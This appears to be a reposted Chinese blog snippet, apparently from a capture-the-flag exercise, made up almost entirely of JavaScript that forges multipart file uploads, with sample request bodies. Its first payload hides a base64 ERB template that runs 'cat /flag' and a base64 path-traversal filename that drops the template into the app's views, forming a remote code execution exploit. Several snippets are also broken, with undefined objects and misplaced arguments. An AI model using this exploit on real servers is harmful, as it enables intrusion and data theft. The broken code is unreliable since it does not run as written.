var formData = new FormData(); formData.append("authenticity_token",‘1212121212‘); formData.append("file[context]","zxcvxzcvxzcv"); var content = ‘PCU9IGBjYXQgL2ZsYWcgYCAlPg==‘; //这是文件内容的base64 var blob = new Blob([content],{ type: "image/png"}); formData.append("file[myfile]",blob,"Ly4uLy4uL2FwcC92aWV3cy9ob21lL2FhMzguZXJi"); //这里是文件名的base64 formData.append("commit",‘submit‘); var request = new XMLHttpRequest(); request.open("POST","https://xz.aliyun.com/t/3245"); request.send(formData);
请求体
------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2 Content-disposition: form-data; name="authenticity_token" 1212121212 ------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2 Content-disposition: form-data; name="file[context]" zxcvxzcvxzcv ------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2 Content-disposition: form-data; name="file[myfile]"; filename="Ly4uLy4uL2FwcC92aWV3cy9ob21lL2FhMzguZXJi" Content-Type: image/png PCU9IGBjYXQgL2ZsYWcgYCAlPg== ------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2 Content-disposition: form-data; name="commit" submit ------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2--
1.用h5对象上传表单(txt)
var formData = new FormData(); var content = ‘testestestes‘; //这是文件内容的base64 var blob = new Blob([content],{ type: "text/plain"}); formData.append("file[myfile]","haha.txt"); //这里是文件名的base64 formData.append("commit","https://xz.aliyun.com/t/3245"); request.send(formData);
请求体
------WebKitFormBoundaryFcFYtbPnXsiq8yjI Content-disposition: form-data; name="file[myfile]"; filename="haha.txt" Content-Type: text/plain testestestes ------WebKitFormBoundaryFcFYtbPnXsiq8yjI Content-disposition: form-data; name="commit" submit ------WebKitFormBoundaryFcFYtbPnXsiq8yjI--
2.使用原生js上传表单数据
通过余弦这个网站辅助生成表单
xhr = function(){ /*AJAX*/ var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); } else if(window.ActiveXObject) { try { request = new window.ActiveXObject(‘Microsoft.XMLHTTP‘); } catch(e) {} } return request; }(); request = function(method,src,argv,content_type){ xhr.open(method,false); if(method==‘POST‘)xhr.setRequestHeader(‘Content-Type‘,content_type); xhr.send(argv); return xhr.responseText; } attack_a = function(){ var src = "https://xz.aliyun.com"; var authenticity_token = "1212121212"; var file = "zxcvxzcvxzcv"; var argv_0 = "\r\n"; argv_0 += "---------------------7964f8dddeb95fc5\r\nContent-disposition: form-data; name=\"authenticity_token\"\r\n\r\n"; argv_0 += (authenticity_token+"\r\n"); argv_0 += "---------------------7964f8dddeb95fc5\r\nContent-disposition: form-data; name=\"file\"\r\n\r\n"; argv_0 += (file+"\r\n"); argv_0 += "---------------------7964f8dddeb95fc5--\r\n"; request("POST",argv_0,"multipart/form-data; boundary=-------------------7964f8dddeb95fc5"); }
请求体:
---------------------7964f8dddeb95fc5 Content-disposition: form-data; name="authenticity_token" 1212121212 ---------------------7964f8dddeb95fc5 Content-disposition: form-data; name="file" zxcvxzcvxzcv ---------------------7964f8dddeb95fc5--
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。
